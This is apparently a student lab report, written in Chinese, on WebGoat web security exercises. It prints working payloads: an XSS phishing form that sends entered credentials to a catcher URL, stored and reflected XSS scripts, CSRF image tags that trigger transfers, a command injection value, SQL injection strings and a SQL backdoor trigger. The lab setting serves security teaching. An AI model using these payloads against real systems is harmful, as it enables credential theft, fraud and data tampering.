20155233 劉高樂 Exp9 Web安全基礎
WbGoat
- 輸入
java -jar webgoat-container-7.1-exec.jar
- 在瀏覽器輸入
localhost:8080/WebGoat
,進入WebGoat
開始實驗
Cross-Site Scripting(XSS)練習
1.Phishing with XSS (網路釣魚)
在搜索框中輸入XSS攻擊代碼,利用XSS可以在已存在的頁面中進一步添加元素的特點。我們先創建一個form,讓受害人在我們創建的form中填寫用戶名和密碼,再添加一段JavaScript代碼,讀取受害人輸入的用戶名和密碼,完整的XSS攻擊代碼如下:
</form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); } </script> <form name="phish"> <br> <br> <HR> <H2>This feature requires account login:</H2> <br> <br>Enter Username:<br> <input type="text" name="user"> <br>Enter Password:<br> <input type="password" name = "pass"> <br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <br> <br> <HR>
在搜索框中輸入攻擊代碼後點擊搜索,會看到一個要求輸入用戶名密碼的表單,如圖所示:
- 輸入用戶名密碼,點擊登錄,WebGoat會將你輸入的信息捕獲並反饋給你:
2.Stored XSS Attacks
- 創建非法的消息內容,可以導致其他用戶訪問時載入非預期的頁面或內容,輸入標題,然後在message中輸入一串代碼,比如:
<script>alert("20155233 attack succeed!");</script>
- 提交後,再次點擊剛剛創建的帖子,成功彈出窗口,說明攻擊成功:
3.Reflected XSS Attacks
- 當我們輸入錯誤用戶信息後,服務器校驗輸入有誤,返回錯誤頁面並將錯誤內容展示給我們看:
- 這時如果我們將帶有攻擊性的URL作為輸入源,例如依舊輸入
<script>alert("20155233 attack succeed!");</script>
,就會彈出對話框:
存儲型XSS是持久化的,代碼是存儲在服務器中,比較典型的例子就是上面所用的留言板;
反射型XSS攻擊是非持久化的,應用的場景比如欺騙用戶自己去點擊鏈接才能觸發XSS代碼,也就是說它的代碼是不存在服務器中的。
4.Cross Site Request Forgery(CSRF)
- 寫一個URL誘使其他用戶點擊,從而觸發CSRF攻擊,通過圖片的的形式將URL放進Message框,這時的URL對其他用戶是不可見的,用戶一旦點擊圖片,就會觸發一個CSRF事件。
- 我們在message框中輸入這樣一串代碼:
<img src="http://localhost:8080/WebGoat/attack?Screen=2078372&menu=900&transferFunds=500" width="1" height="1">
5.CSRF Prompt By-Pass
內容和前者相似,只不過這次需要確認轉賬,首先編輯內容
<img src="http://localhost:8080/WebGoat/attack?Screen=1471017872&menu=900&transferFunds=500" width="1" height="1">
在瀏覽器中輸入URL:
localhost:8080/WebGoat/attack?Screen=1471017872&menu=900&transferFunds=CONFIRM
- 點擊
CONFIRM
按鈕,再在瀏覽器中輸入URL:http://localhost:8080/WebGoat/attack?Screen=1471017872&menu=900&transferFunds=CONFIRM
,成功轉走了5000元:
Injection Flaws練習
6.Command Injection
- 點擊右上角小蟲對源碼進行修改,例如在
BackDoors.help
旁邊加上"& netstat -an & ipconfig"
:
- 之後在下拉菜單中能看到我們修改後的值:
- 選中修改後的值再點view,可以看到命令被執行,出現系統網絡連接情況:
7.Numeric SQL Injection
- 通過註入SQL字符串的方式查看所有的天氣數據,加上一個
1=1
這種永真式即可達到我們的目的,利用firebug
,在任意一個值比如101
旁邊加上or 1=1
:
- 選中
Columbia
,點Go
,可以看到所有天氣數據:
8.Log Spoofing
- 我們輸入的用戶名會被追加到日誌文件中,所以我們可以使用障眼法來使用戶名為
admin
的用戶在日誌中顯示“成功登錄”,在User Name
文本框中輸入20155233%0d%0aLogin Succeeded for username: admin
,其中%0d
是回車,%0a
是換行符:
- 上圖可顯示我們攻擊成功。
9.String SQL Injection
- 構造SQL註入字符串,在文本框中輸入
‘ or 1=1 --
:
- 點擊
GO
,可以查看到所以信息:
10.LAB:SQL Injection(Stage 1:String SQL Injection)
- 查看輸入框最大長度並修改長度:
- 以用戶John登錄,在密碼欄中輸入
‘ or 1=1 --
進行SQL註入:
11.Database Backdoors
- 先輸一個101,得到了該用戶的信息:
- 可以發現輸入的語句沒有驗證,很容易進行SQL註入,輸入註入語句:
101; update employee set salary=100000
,成功把該用戶的工資漲到了100000:
- 接下來使用語句
101;CREATE TRIGGER lglBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=‘[email protected]‘ WHERE userid = NEW.userid
創建一個後門,把表中所有的郵箱和用戶ID都設為我的:
基礎問題回答
- SQL註入攻擊原理,如何防禦?
- 答:SQL註入攻擊就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意SQL命令的目的。
- 對於SQL註入攻擊的防範:使用正則表達式過濾傳入的參數,字符串過濾,jsp中調用該函數檢查是否包函非法字符。
XSS攻擊的原理,如何防禦?
- 答:XSS是代碼註入的一種,它允許惡意用戶將代碼註入到網頁上,並能夠被瀏覽器成功的執行,其他用戶在觀看網頁時就會受到影響。這類攻擊通常包含了HTML以及用戶端腳本語言。XSS攻擊的主要目的是,想辦法獲取目標攻擊網站的cookie,因為有了cookie相當於有了seesion,有了這些信息就可以在任意能接進互聯網的pc登陸該網站,並以其他人的身份登陸,做一些破壞。
XSS的防禦可以從以下兩方面來進行: 一種方法是在表單提交或者url參數傳遞前,對需要的參數進行過濾;檢查用戶輸入的內容中是否有非法內容,如尖括號、引號等,嚴格控制輸出。
CSRF攻擊原理,如何防禦?
- 答:XSS是跨站腳本攻擊,就是在用戶的瀏覽器中執行攻擊者的腳本,來獲得其cookie等信息。而CSRF是借用用戶的身份,向web server發送請求,因為該請求不是用戶本意,所以稱為“跨站請求偽造”。
對於CSRF的防禦也可以從以下幾個方面入手:通過referer、token或者驗證碼來檢測用戶提交;盡量不要在頁面的鏈接中暴露用戶隱私信息,對於用戶修改刪除等操作最好都使用post操作;避免全站通用的cookie,嚴格設置cookie的域。
實驗體會
- 本次實驗讓我體會到網絡安全的重要性,以及web網站安全編程的迫切性,可想而知,如果有人去找你網站的漏洞,那麽只有你有一個可攻擊點,那麽這可能毀了整個網站,造成巨大的損失。其次,本次實驗練習了好多攻擊方式這對知識的提高有很大的幫助,也明白了其具體的工作流程,增深了對知識點的掌握。
20155233 劉高樂 Exp9 Web安全基礎